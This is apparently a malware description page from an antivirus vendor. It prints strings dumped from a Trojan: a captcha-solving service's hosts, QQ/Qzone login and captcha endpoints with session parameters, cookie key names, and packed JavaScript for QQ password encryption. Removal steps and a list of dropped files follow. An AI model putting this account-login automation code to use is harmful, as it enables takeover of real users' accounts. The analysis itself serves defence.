[%d]%s
reg2:%s
checkok:%s %s
check fail:%s %s %s
check:%s %s
getcjfail:%s %s
getcj:%s %s
%s%uout
%s%uin
put img ok:%s
put img fail:%s
put img:%s %s %d
get result ok:%s,%s
get result fail:%s
get result:%s
notifyfail ok:%s
%s\%d-%s.png
notifyfail fail:%s,%s
notifyfail:%s
getimgok:%s,%s
getimg:%s
getinfo fail:%s
getinfo:%s,%s
setresult:%s,%s
HTTP/1.1 200 OK
recv:%d
send:%d
GET /ip.txt HTTP/1.1
Host: %s
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2
select:%d
ioctlsocket:%d
socket:%d
api.qqchaoren.net
14.17.65.24
14.17.65.23
dama2.qqchaoren.net
dama1.qqchaoren.net
connect total:%s %d
:%s %d
connect discard:%s %d
[d-d-d d:d:d](u)
recv timeout:<%d>
recvfail:<%d>%d
server close:<%d>%d
recv:<%d>%d
send:<%d>%d
sendfail:<%d>%d
connect timeout:<%d>
connectok:<%d>%s %hu
127.0.0.1
1.1.3
p_skey=;
airkey=;
&appid=549000912&js_ver=10135&js_type=1&login_sig=&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&r=0.
hXXp://check.ptlogin2.qq.com/check?regmaster=&pt_tea=1&pt_vcode=1&uin=
hXXp://captcha.qq.com/cap_union_new_getsig?aid=549000912&asig=&captype=&clientype=2&disturblevel=&apptype=2&curenv=inner&noBorder=noborder&showtype=embed&uid=
hXXp://captcha.qq.com/getimgbysig?clientype=2&uin=
hXXp://captcha.qq.com/cap_union_verify?aid=549000912&uin=
&pt_randsalt=0&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&ptredirect=0&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=21-43-1443602837456&js_ver=10135&js_type=1&login_sig=bX2vEC1My7mgtm3kIVH0UY57UQiklmQQaaq2BdbCVtd39fDjGGywlyInOnozDIje&pt_uistyle=32&aid=549000912&daid=5&pt_qzone_sig=1&
hXXp://ptlogin2.qq.com/login?u=
&js_ver=10135&js_type=1&login_sig=&pt_uistyle=32&aid=549000912&daid=5&pt_qzone_sig=1&
&pt_randsalt=0&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&ptredirect=0&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=5-23-
hXXp://user.qzone.qq.com/
function time(){return Math.random()}
function time(){return new Date().getTime()}
skey
&appid=549000912&js_ver=10136&js_type=1&login_sig=kfeUZrYNBwRRGcymoO5RMcqKXaknId-Z7Pju9ufQQM5CYzbfYStee8y5nnsqAJuP&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&r=0.25413458029055885
hXXp://captcha.qq.com/cap_union_show?clientype=2&uin=
hXXp://captcha.qq.com/getimgbysig?aid=549000912&uin=
hXXps://ssl.captcha.qq.com/cap_union_new_verify?random=
aid=549000912&asig=&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&curenv=inner&noBorder=noborder&showtype=embed&uid=
hXXps://ssl.captcha.qq.com/cap_union_new_getsig?aid=549000912&asig=&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&curenv=inner&noBorder=noborder&showtype=embed&uid=
&pt_randsalt=0&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&ptredirect=0&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=8-30-1445255935887&js_ver=10136&js_type=1&login_sig=kfeUZrYNBwRRGcymoO5RMcqKXaknId-Z7Pju9ufQQM5CYzbfYStee8y5nnsqAJuP&pt_uistyle=32&aid=549000912&daid=5&pt_qzone_sig=1&
_0_1_0_0_1|10|11|12|13_5|17|20|9_0_8_1|18&g_tk=
|8_8_
_0|14_
hXXp://r.qzone.qq.com/cgi-bin/right_frame.cgi?uin=
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('Y 1O=X(){X r(){W.n=1d;W.e=0;W.4V=W.3h=W.4k=W.q=W.p=W.d=1d}X B(r,z,I){1d!=r&&("50"==2W r?W.3i(r,z,I):1d==z&&"3T"!=2W r?W.1S(r,1B):W.1S(r,z))}X z(){Z 1u B(1d)}X A(r){Y V=z();V.2c(r);Z V}X D(r){Y z=1,I;0!=(I=r>>>16)&&(r=I,z =16);0!=(I=r>>8)&&(r=I,z =8);0!=(I=r>>4)&&(r=I,z =4);0!=(I=r>>2)&&(r=I,z =2);0!=r>>1&&(z =1);Z z}X C(r){W.m=r}X E(r){W.m=r;W.2a=r.2V();W.2f=W.2a&1N;W.2U=W.2a>>15;W.2T=(1<<r.1e-15)-1;W.2S=2*r.t}X F(){Y r=(1u 3k).3G();L[G  ]^=r&1f;L[G  ]^=r>>8&1f;L[G  ]^=r>>16&1f;L[G  ]^=r>>24&1f;G>=U&&(G-=U)}X O(){}X N(){W.j=W.i=0;W.S=[]}r.1b.2R=X(r){Z r.2Q(W.e,W.n)};r.1b.2P=X(r,z){1d!=r&&1d!=z&&0<r.1c&&0<z.1c?(W.n=1u B(r,16),W.e=1T(z,16)):2O("3l 1O 3p 3r")};r.1b.26=X(r){Y z;z=W.n.2N() 7>>3;1a(z<r.1c 11)2O("3a 3c 3f 19 1O"),z=1d;1h{19(Y I=[],A=r.1c-1;0<=A&&0<z;){Y D=r.1C(A--);I[--z]=D}I[--z]=0;r=1u O;19(A=[];2<z;){19(A[0]=0;0==A[0];)r.2M(A);I[--z]=A[0]}I[--z]=2;I[--z]=0;z=1u B(I)}1a(1d==z)Z 1d;z=W.2R(z);1a(1d==z)Z 1d;z=z.1F(16);Z 0==(z.1c&1)?z:"0" z};Y H;B.1b.1z=X(r,z,A,B,D,C){Y E=z&1N;19(z>>=15;0<=--C;){Y R=W[r]&1N,F=W[r  ]>>15,G=z*R F*E,R=E*R ((G&1N)<<15) A[B] (D&2L);D=(R>>>30) (G>>>15) z*F (D>>>30);A[B  ]=R&2L}Z D};H=30;B.1b.1e=H;B.1b.1s=(1<<H)-1;B.1b.1o=1<<H;B.1b.2K=1p.3d(2,52);B.1b.27=52-H;B.1b.29=2*H-52;Y S=[],K;H=48;19(K=0;9>=K;  K)S[H  ]=K;H=3n;19(K=10;36>K;  K)S[H  ]=K;H=3D;19(K=10;36>K;  K)S[H  ]=K;C.1b.2e=X(r){Z 0>r.s||0<=r.1H(W.m)?r.2J(W.m):r};C.1b.2m=X(r){Z r};C.1b.1A=X(r){r.1Q(W.m,1d,r)};C.1b.1V=X(r,z,A){r.1X(z,A);W.1A(A)};C.1b.1Y=X(r,z){r.25(z);W.1A(z)};E.1b.2e=X(r){Y A=z();r.1w().1L(W.m.t,A);A.1Q(W.m,1d,A);0>r.s&&0<A.1H(B.1x)&&W.m.1m(A,A);Z A};E.1b.2m=X(r){Y A=z();r.1I(A);W.1A(A);Z A};E.1b.1A=X(r){19(;r.t<=W.2S;)r[r.t  ]=0;19(Y 
z=0;z<W.m.t;  z){Y A=r[z]&1N,B=A*W.2f ((A*W.2U (r[z]>>15)*W.2f&W.2T)<<15)&r.1s,A=z W.m.t;19(r[A] =W.m.1z(0,B,r,z,0,W.m.t);r[A]>=r.1o;)r[A]-=r.1o,r[  A]  }r.1q();r.2b(W.m.t,r);0<=r.1H(W.m)&&r.1m(W.m,r)};E.1b.1V=X(r,z,A){r.1X(z,A);W.1A(A)};E.1b.1Y=X(r,z){r.25(z);W.1A(z)};B.1b.1I=X(r){19(Y z=W.t-1;0<=z;--z)r[z]=W[z];r.t=W.t;r.s=W.s};B.1b.2c=X(r){W.t=1;W.s=0>r?-1:0;0<r?W[0]=r:-1>r?W[0]=r 1o:W.t=0};B.1b.1S=X(r,z){Y A;1a(16==z)A=4;1h 1a(8==z)A=3;1h 1a(1B==z)A=8;1h 1a(2==z)A=1;1h 1a(32==z)A=5;1h 1a(4==z)A=2;1h{W.3I(r,z);Z}W.s=W.t=0;19(Y D=r.1c,C=!1,E=0;0<=--D;){Y J;8==A?J=r[D]&1f:(J=S[r.1C(D)],J=1d==J?-1:J);0>J?"-"==r.1l(D)&&(C=!0):(C=!1,0==E?W[W.t  ]=J:E A>W.1e?(W[W.t-1]|=(J&(1<<W.1e-E)-1)<<E,W[W.t  ]=J>>W.1e-E):W[W.t-1]|=J<<E,E =A,E>=W.1e&&(E-=W.1e))}8==A&&0!=(r[0]&2I)&&(W.s=-1,0<E&&(W[W.t-1]|=(1<<W.1e-E)-1<<E));W.1q();C&&B.1x.1m(W,W)};B.1b.1q=X(){19(Y r=W.s&W.1s;0<W.t&&W[W.t-1]==r;)--W.t};B.1b.1L=X(r,z){Y A;19(A=W.t-1;0<=A;--A)z[A r]=W[A];19(A=r-1;0<=A;--A)z[A]=0;z.t=W.t r;z.s=W.s};B.1b.2b=X(r,z){19(Y A=r;A<W.t;  A)z[A-r]=W[A];z.t=1p.4R(W.t-r,0);z.s=W.s};B.1b.2k=X(r,z){Y A=r%W.1e,B=W.1e-A,D=(1<<B)-1,C=1p.1P(r/W.1e),E=W.s<<A&W.1s,F;19(F=W.t-1;0<=F;--F)z[F C 1]=W[F]>>B|E,E=(W[F]&D)<<A;19(F=C-1;0<=F;--F)z[F]=0;z[C]=E;z.t=W.t C 1;z.s=W.s;z.1q()};B.1b.2n=X(r,z){z.s=W.s;Y A=1p.1P(r/W.1e);1a(A>=W.t)z.t=0;1h{Y B=r%W.1e,D=W.1e-B,C=(1<<B)-1;z[0]=W[A]>>B;19(Y E=A 1;E<W.t;  E)z[E-A-1]|=(W[E]&C)<<D,z[E-A]=W[E]>>B;0<B&&(z[W.t-A-1]|=(W.s&C)<<D);z.t=W.t-A;z.1q()}};B.1b.1m=X(r,z){19(Y A=0,B=0,D=1p.3b(r.t,W.t);A<D;)B =W[A]-r[A],z[A  ]=B&W.1s,B>>=W.1e;1a(r.t<W.t){19(B-=r.s;A<W.t;)B =W[A],z[A  ]=B&W.1s,B>>=W.1e;B =W.s}1h{19(B =W.s;A<r.t;)B-=r[A],z[A  ]=B&W.1s,B>>=W.1e;B-=r.s}z.s=0>B?-1:0;-1>B?z[A  ]=W.1o B:0<B&&(z[A  ]=B);z.t=A;z.1q()};B.1b.1X=X(r,z){Y A=W.1w(),D=r.1w(),C=A.t;19(z.t=C D.t;0<=--C;)z[C]=0;19(C=0;C<D.t;  C)z[C A.t]=A.1z(0,D[C],z,C,0,A.t);z.s=0;z.1q();W.s!=r.s&&B.1x.1m(z,z)};B.1b.25=X(r){19(Y z=W.1w(),A=r.t=2*z.t;0<=--A;)r[A]=0;19(A=0;A<z.t-1;  A){Y 
B=z.1z(A,z[A],r,2*A,0,1);(r[A z.t] =z.1z(A 1,2*z[A],r,2*A 1,B,z.t-A-1))>=z.1o&&(r[A z.t]-=z.1o,r[A z.t 1]=1)}0<r.t&&(r[r.t-1] =z.1z(A,z[A],r,2*A,0,1));r.s=0;r.1q()};B.1b.1Q=X(r,A,C){Y E=r.1w();1a(!(0>=E.t)){Y F=W.1w();1a(F.t<E.t)1d!=A&&A.2c(0),1d!=C&&W.1I(C);1h{1d==C&&(C=z());Y M=z(),J=W.s;r=r.s;Y G=W.1e-D(E[E.t-1]);0<G?(E.2k(G,M),F.2k(G,C)):(E.1I(M),F.1I(C));E=M.t;F=M[E-1];1a(0!=F){Y H=F*(1<<W.27) (1<E?M[E-2]>>W.29:0),K=W.2K/H,H=(1<<W.27)/H,L=1<<W.29,Q=C.t,N=Q-E,P=1d==A?z():A;M.1L(N,P);0<=C.1H(P)&&(C[C.t  ]=1,C.1m(P,C));B.1U.1L(E,P);19(P.1m(M,M);M.t<E;)M[M.t  ]=0;19(;0<=--N;){Y O=C[--Q]==F?W.1s:1p.1P(C[Q]*K (C[Q-1] L)*H);1a((C[Q] =M.1z(0,O,C,N,0,E))<O)19(M.1L(N,P),C.1m(P,C);C[Q]<--O;)C.1m(P,C)}1d!=A&&(C.2b(E,A),J!=r&&B.1x.1m(A,A));C.t=E;C.1q();0<G&&C.2n(G,C);0>J&&B.1x.1m(C,C)}}}};B.1b.2V=X(){1a(1>W.t)Z 0;Y r=W[0];1a(0==(r&1))Z 0;Y z=r&3,z=z*(2-(r&15)*z)&15,z=z*(2-(r&1f)*z)&1f,z=z*(2-((r&1G)*z&1G))&1G,z=z*(2-r*z%W.1o)%W.1o;Z 0<z?W.1o-z:-z};B.1b.2G=X(){Z 0==(0<W.t?W[0]&1:W.s)};B.1b.2E=X(r,A){1a(1r<r||1>r)Z B.1U;Y C=z(),E=z(),F=A.2e(W),G=D(r)-1;19(F.1I(C);0<=--G;)1a(A.1Y(C,E),0<(r&1<<G))A.1V(E,F,C);1h Y J=C,C=E,E=J;Z A.2m(C)};B.1b.1F=X(r){1a(0>W.s)Z"-" W.1Z().1F(r);1a(16==r)r=4;1h 1a(8==r)r=3;1h 1a(2==r)r=1;1h 1a(32==r)r=5;1h 1a(4==r)r=2;1h Z W.3o(r);Y z=(1<<r)-1,A,B=!1,C="",D=W.t,E=W.1e-D*W.1e%r;1a(0<D--)19(E<W.1e&&0<(A=W[D]>>E)&&(B=!0,C="2A".1l(A));0<=D;)E<r?(A=(W[D]&(1<<E)-1)<<r-E,A|=W[--D]>>(E =W.1e-r)):(A=W[D]>>(E-=r)&z,0>=E&&(E =W.1e,--D)),0<A&&(B=!0),B&&(C ="2A".1l(A));Z B?C:"0"};B.1b.1Z=X(){Y r=z();B.1x.1m(W,r);Z r};B.1b.1w=X(){Z 0>W.s?W.1Z():W};B.1b.1H=X(r){Y z=W.s-r.s;1a(0!=z)Z z;Y A=W.t,z=A-r.t;1a(0!=z)Z z;19(;0<=--A;)1a(0!=(z=W[A]-r[A]))Z z;Z 0};B.1b.2N=X(){Z 0>=W.t?0:W.1e*(W.t-1) D(W[W.t-1]^W.s&W.1s)};B.1b.2J=X(r){Y A=z();W.1w().1Q(r,1d,A);0>W.s&&0<A.1H(B.1x)&&r.1m(A,A);Z A};B.1b.2Q=X(r,z){Y A;A=1B>r||z.2G()?1u C(z):1u E(z);Z W.2E(r,A)};B.1x=A(0);B.1U=A(1);Y T,L,G;1a(1d==L){L=[];19(G=0;G<U;)H=1p.1P(3t*1p.2z()),L[G  ]=H>>>8,L[G  
]=H&1f;G=0;F()}O.1b.2M=X(r){Y z;19(z=0;z<r.1c;  z){Y A=z,B;1a(1d==T){F();T=1u N;T.2y(L);19(G=0;G<L.1c;  G)L[G]=0;G=0}B=T.2x();r[A]=B}};N.1b.2y=X(r){Y z,A,B;19(z=0;1B>z;  z)W.S[z]=z;19(z=A=0;1B>z;  z)A=A W.S[z] r[z%r.1c]&1f,B=W.S[z],W.S[z]=W.S[A],W.S[A]=B;W.j=W.i=0};N.1b.2x=X(){Y r;W.i=W.i 1&1f;W.j=W.j W.S[W.i]&1f;r=W.S[W.i];W.S[W.i]=W.S[W.j];W.S[W.j]=r;Z W.S[r W.S[W.i]&1f]};Y U=1B;Z{2r:X(z,A,B){A="41";B="3";Y C=1u r;C.2P(A,B);Z C.26(z)}}}(),s="",a=0,g=[],x=[],y=0,u=0,m=[],t=[],n=!0;X e(){Z 1p.35(1r*1p.2z())}X j(r,B,z){1a(!z||4<z)z=4;19(Y A=0,D=B;D<B z;D  )A<<=8,A|=r[D];Z(A&1r)>>>0}X b(r,B,z){r[B 3]=z>>0&1f;r[B 2]=z>>8&1f;r[B 1]=z>>16&1f;r[B 0]=z>>24&1f}X w(r){1a(!r)Z"";19(Y B="",z=0;z<r.1c;z  ){Y A=59(r[z]).1F(16);1==A.1c&&(A="0" A);B =A}Z B}X v(r){19(Y B="",z=0;z<r.1c;z =2)B =2h.2i(1T(r.2j(z,2),16));Z B}X c(r){1a(!r)Z"";19(Y B=[],z=0;z<r.1c;z  )B[z]=r.1C(z);Z w(B)}X h(r){g=1t(8);x=1t(8);y=u=0;n=!0;a=0;Y B=r.1c,z=0;a=(B 10)%8;0!=a&&(a=8-a);m=1t(B a 10);g[0]=(e()&3m|a)&1f;19(z=1;z<=a;z  )g[z]=e()&1f;a  ;19(z=0;8>z;z  )x[z]=0;19(z=1;2>=z;)8>a&&(g[a  ]=e()&1f,z  ),8==a&&p();19(z=0;0<B;)8>a&&(g[a  ]=r[z  ],B--),8==a&&p();19(z=1;7>=z;)8>a&&(g[a  ]=0,z  ),8==a&&p();Z m}X q(r){Y B=0,z=1t(8),B=r.1c;t=r;1a(0!=B%8||16>B)Z 1d;x=l(r);a=x[0]&7;B=B-a-10;1a(0>B)Z 1d;19(Y A=0;A<z.1c;A  )z[A]=0;m=1t(B);u=0;y=8;a  ;19(A=1;2>=A;)1a(8>a&&(a  ,A  ),8==a&&(z=r,!f()))Z 1d;19(A=0;0!=B;)1a(8>a&&(m[A]=(z[u a]^x[a])&1f,A  ,B--,a  ),8==a&&(z=r,u=y-8,!f()))Z 1d;19(A=1;8>A;A  ){1a(8>a){1a(0!=(z[u a]^x[a]))Z 1d;a  }1a(8==a&&(z=r,u=y,!f()))Z 1d}Z m}X p(){19(Y r=0;8>r;r  )g[r]=n?g[r]^x[r]:g[r]^m[u r];19(Y B=k(g),r=0;8>r;r  )m[y r]=B[r]^x[r],x[r]=g[r];u=y;y =8;a=0;n=!1}X k(r){Y B=16,z=j(r,0,4);r=j(r,4,4);19(Y A=j(s,0,4),D=j(s,4,4),C=j(s,8,4),E=j(s,12,4),F=0;0<B--;)F =2o,F=(F&1r)>>>0,z =(r<<4) A^r F^(r>>>5) D,z=(z&1r)>>>0,r =(z<<4) C^z F^(z>>>5) E,r=(r&1r)>>>0;B=1t(8);b(B,0,z);b(B,4,r);Z B}X l(r){Y B=16,z=j(r,0,4);r=j(r,4,4);19(Y A=j(s,0,4),D=j(s,4,4),C=j(s,8,4),E=j(s,12,4),F=3y;0<B--;)r-=(z<<4) C^z 
F^(z>>>5) E,r=(r&1r)>>>0,z-=(r<<4) A^r F^(r>>>5) D,z=(z&1r)>>>0,F-=2o,F=(F&1r)>>>0;B=1t(8);b(B,0,z);b(B,4,r);Z B}X f(){19(Y r=0;8>r;r  )x[r]^=t[y r];x=l(x);y =8;a=0;Z!0}X o(r,B){Y z=[];1a(B)19(Y A=0;A<r.1c;A  )z[A]=r.1C(A)&1f;1h 19(Y D=0,A=0;A<r.1c;A =2)z[D  ]=1T(r.2j(A,2),16);Z z}Y 1D={26:X(r,B){Y z=o(r,B),z=h(z);Z w(z)},2p:X(r,B){19(Y z=o(r,B),z=h(z),A="",D=0;D<z.1c;D  )A =2h.2i(z[D]);Z d.2q(A)},3X:X(r){r=o(r,!1);r=q(r);Z w(r)},2g:X(r,B){s=o(r,B)},4g:v,28:c,4y:w,4C:o},d={2s:"=",2t:"4S /",2u:X(r,B){Y z=r.1C(B);1a(1f<z)2v"53: 54 34 5";Z z},2q:X(r){1a(1!=2w.1c)2v"37: 38 39 2w";Y B=d.2s,z=d.2t,A=d.2u,D,C,E=[];r="" r;Y F=r.1c-r.1c%3;1a(0==r.1c)Z r;19(D=0;D<F;D =3)C=A(r,D)<<16|A(r,D 1)<<8|A(r,D 2),E.1y(z.1l(C>>18)),E.1y(z.1l(C>>12&1J)),E.1y(z.1l(C>>6&1J)),E.1y(z.1l(C&1J));3e(r.1c-F){2B 1:C=A(r,D)<<16;E.1y(z.1l(C>>18) z.1l(C>>12&1J) B B);3g;2B 2:C=A(r,D)<<16|A(r,D 1)<<8,E.1y(z.1l(C>>18) z.1l(C>>12&1J) z.1l(C>>6&1J) B)}Z E.2C("")}},2D=1,3j="",1n=8,2F=32;X 1W(r){Z 2H(r)}X 2H(r){Z 2l(1E(1K(r),r.1c*1n))}X 3q(r){Z 2d(1E(1K(r),r.1c*1n))}X 3s(r,B){Z 2l(1R(r,B))}X 3u(r,B){Z 3v(1R(r,B))}X 3w(r,B){Z 2d(1R(r,B))}X 1E(r,B){r[B>>5]|=2I<<B2;r[(B 3x>>>9<<4) 14]=B;19(Y z=3z,A=-3A,D=-3B,C=3C,E=0;E<r.1c;E =16)Y F=z,O=A,N=D,H=C,z=1j(z,A,D,C,r[E 0],7,-3E),C=1j(C,z,A,D,r[E 1],12,-3F),D=1j(D,C,z,A,r[E 2],17,3H),A=1j(A,D,C,z,r[E 3],22,-3J),z=1j(z,A,D,C,r[E 4],7,-3K),C=1j(C,z,A,D,r[E 5],12,3L),D=1j(D,C,z,A,r[E 6],17,-3M),A=1j(A,D,C,z,r[E 7],22,-3N),z=1j(z,A,D,C,r[E 8],7,3O),C=1j(C,z,A,D,r[E 9],12,-3P),D=1j(D,C,z,A,r[E 10],17,-3Q),A=1j(A,D,C,z,r[E 11],22,-3R),z=1j(z,A,D,C,r[E 12],7,3S),C=1j(C,z,A,D,r[E 13],12,-3U),D=1j(D,C,z,A,r[E 14],17,-3V),A=1j(A,D,C,z,r[E 15],22,3W),z=1g(z,A,D,C,r[E 1],5,-3Y),C=1g(C,z,A,D,r[E 6],9,-3Z),D=1g(D,C,z,A,r[E 11],14,40),A=1g(A,D,C,z,r[E 0],20,-42),z=1g(z,A,D,C,r[E 5],5,-43),C=1g(C,z,A,D,r[E 10],9,44),D=1g(D,C,z,A,r[E 15],14,-45),A=1g(A,D,C,z,r[E 4],20,-46),z=1g(z,A,D,C,r[E 9],5,47),C=1g(C,z,A,D,r[E 14],9,-49),D=1g(D,C,z,A,r[E 3],14,-4a),A=1g(A,D,C,z,r[E 
8],20,4b),z=1g(z,A,D,C,r[E 13],5,-4c),C=1g(C,z,A,D,r[E 2],9,-4d),D=1g(D,C,z,A,r[E 7],14,4e),A=1g(A,D,C,z,r[E 12],20,-4f),z=1i(z,A,D,C,r[E 5],4,-4h),C=1i(C,z,A,D,r[E 8],11,-4i),D=1i(D,C,z,A,r[E 11],16,4j),A=1i(A,D,C,z,r[E 14],23,-4l),z=1i(z,A,D,C,r[E 1],4,-4m),C=1i(C,z,A,D,r[E 4],11,4n),D=1i(D,C,z,A,r[E 7],16,-4o),A=1i(A,D,C,z,r[E 10],23,-4p),z=1i(z,A,D,C,r[E 13],4,4q),C=1i(C,z,A,D,r[E 0],11,-4r),D=1i(D,C,z,A,r[E 3],16,-4s),A=1i(A,D,C,z,r[E 6],23,4t),z=1i(z,A,D,C,r[E 9],4,-4u),C=1i(C,z,A,D,r[E 12],11,-4v),D=1i(D,C,z,A,r[E 15],16,4w),A=1i(A,D,C,z,r[E 2],23,-4x),z=1k(z,A,D,C,r[E 0],6,-4z),C=1k(C,z,A,D,r[E 7],10,4A),D=1k(D,C,z,A,r[E 14],15,-4B),A=1k(A,D,C,z,r[E 5],21,-4D),z=1k(z,A,D,C,r[E 12],6,4E),C=1k(C,z,A,D,r[E 3],10,-4F),D=1k(D,C,z,A,r[E 10],15,-4G),A=1k(A,D,C,z,r[E 1],21,-4H),z=1k(z,A,D,C,r[E 8],6,4I),C=1k(C,z,A,D,r[E 15],10,-4J),D=1k(D,C,z,A,r[E 6],15,-4K),A=1k(A,D,C,z,r[E 13],21,4L),z=1k(z,A,D,C,r[E 4],6,-4M),C=1k(C,z,A,D,r[E 11],10,-4N),D=1k(D,C,z,A,r[E 2],15,4O),A=1k(A,D,C,z,r[E 9],21,-4P),z=1v(z,F),A=1v(A,O),D=1v(D,N),C=1v(C,H);Z 16==2F?[A,D]:[z,A,D,C]}X 1M(r,B,z,A,D,C){Z 1v(2X(1v(1v(B,r),1v(A,C)),D),z)}X 1j(r,B,z,A,D,C,E){Z 1M(B&z|~B&A,r,B,D,C,E)}X 1g(r,B,z,A,D,C,E){Z 1M(B&A|z&~A,r,B,D,C,E)}X 1i(r,B,z,A,D,C,E){Z 1M(B^z^A,r,B,D,C,E)}X 1k(r,B,z,A,D,C,E){Z 1M(z^(B|~A),r,B,D,C,E)}X 1R(r,B){Y z=1K(r);16<z.1c&&(z=1E(z,r.1c*1n));19(Y A=1t(16),D=1t(16),C=0;16>C;C  )A[C]=z[C]^4T,D[C]=z[C]^4U;z=1E(A.2Y(1K(B)),4W B.1c*1n);Z 1E(D.2Y(z),4X)}X 1v(r,B){Y z=(r&1G) (B&1G);Z(r>>16) (B>>16) (z>>16)<<16|z&1G}X 2X(r,B){Z r<<B|r>>>32-B}X 1K(r){19(Y B=[],z=(1<<1n)-1,A=0;A<r.1c*1n;A =1n)B[A>>5]|=(r.1C(A/1n)&z)<<A2;Z B}X 2d(r){19(Y B="",z=(1<<1n)-1,A=0;A<32*r.1c;A =1n)B =2h.2i(r[A>>5]>>>A2&z);Z B}X 2l(r){19(Y B=2D?"4Y":"4Z",z="",A=0;A<4*r.1c;A  )z =B.1l(r[A>>2]>>A%4*8 4&15) B.1l(r[A>>2]>>A%4*8&15);Z z}X 2Z(r){19(Y B=[],z=0;z<r.1c;z =2)B.1y("\\\\x" r.2j(z,2));B=B.2C("");51("Y 31 = \'" B "\'");Z 31}X 33(r,B,z,A){z=z||"";r=r||"";r=A?r:1W(r);A=2Z(r);r=1W(A B);A=1O.2r(A);Y 
D=(A.1c/2).1F(16),C=1D.28(z.55());19(z="56" z.1c.1F(16);4>D.1c;)D="0" D;1D.2g(r);B=1D.2p(D A 1D.28(B) z C);1D.2g("");Z B.57(/[\\/\\ =]/g,X(r){Z{"/":"-"," ":"*","=":"58"}[r]})}X 4Q(r,B,z){Z 33(r,B,z,!1)};',62,320,'||||||||||||||||||||||||||||||||||||||||||||||||||||||||||this|function|var|return||||||||||for|if|prototype|length|null|DB|255|md5_gg|else|md5_hh|md5_ff|md5_ii|charAt|subTo|chrsz|DV|Math|clamp|4294967295|DM|Array|new|safe_add|abs|ZERO|push|am|reduce|256|charCodeAt|TEA|core_md5|toString|65535|compareTo|copyTo|63|str2binl|dlShiftTo|md5_cmn|32767|RSA|floor|divRemTo|core_hmac_md5|fromString|parseInt|ONE|mulTo|md5|multiplyTo|sqrTo|negate||||||squareTo|encrypt|F1|strToBytes|F2|mp|drShiftTo|fromInt|binl2str|convert|mpl|initkey|String|fromCharCode|substr|lShiftTo|binl2hex|revert|rShiftTo|2654435769|enAsBase64|encode|rsa_encrypt|PADCHAR|ALPHA|getbyte|throw|arguments|next|init|random|0123456789abcdefghijklmnopqrstuvwxyz|case|join|hexcase|exp|mode|isEven|hex_md5|128|mod|FV|1073741823|nextBytes|bitLength|uv_alert|setPublic|modPowInt|doPublic|mt2|um|mph|invDigit|typeof|bit_rol|concat|hexchar2bin||temp||getEncryption|Exception|round||SyntaxError|Not|enough|Message|min|too|pow|switch|long|break|dmq1|fromNumber|b64pad|Date|Invalid|248|97|toRadix|public|str_md5|key|hex_hmac_md5|65536|b64_hmac_md5|binl2b64|str_hmac_md5|64|3816266640|1732584193|271733879|1732584194|271733878|65|680876936|389564586|getTime|606105819|fromRadix|1044525330|176418897|1200080426|1473231341|45705983|1770035416|1958414417|42063|1990404162|1804603682|string|40341101|1502002290|1236535329|decrypt|165796510|1069501632|643717713|F20CE00BAE5361F8FA3AE9CEFA495362FF7DA1BA628F64A347F0A8C012BF0B254A30CD92ABFFE7A6EE0DC424CB6166F8819EFA5BCCB20EDFB4AD02E412CCF579B1CA711D55B8B0B3AEB60153D5E0693A2A86F3167D7847A0CB8B00004716A9095D9BADC977CBB804DBDCBA6029A9710869A453F27DFDDF83C016D928B3CBF4C7|373897302|701558691|38016083|660478335|405537848|568446438||1019803690|187363961|1163531501|1444681467|51403784|1735328473|1
926607734|bytesToStr|378558|2022574463|1839030562|dmp1|35309556|1530992060|1272893353|155497632|1094730640|681279174|358537222|722521979|76029189|640364487|421815835|530742520|995338651|bytesInStr|198630844|1126891415|1416354905|dataFromStr|57434055|1700485571|1894986606|1051523|2054922799|1873313359|30611744|1560198380|1309151649|145523070|1120210379|718787259|343485551|Hs|max|ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789|909522486|1549556828|coeff|512|640|0123456789ABCDEF|0123456789abcdef|number|eval||INVALID_CHARACTER_ERR|DOM|toUpperCase|000|replace|_|Number'.split('|'),0,{}))

%original file name%.exe_3188_rwx_10001000_00039000:



Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager): No processes have been created.
  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\kjkjz1[1].htm (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\gjgg[1].htm (3261 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\4473463[1].js (25 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\qqkjz13[1].htm (503 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\ssggd1[1].htm (109 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\19059730[1].js (25 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\EE3IW6XC.txt (231 bytes)
    C:\dc.dll (122 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\History\History.IE5\MSHist012017062020170621\index.dat (16 bytes)
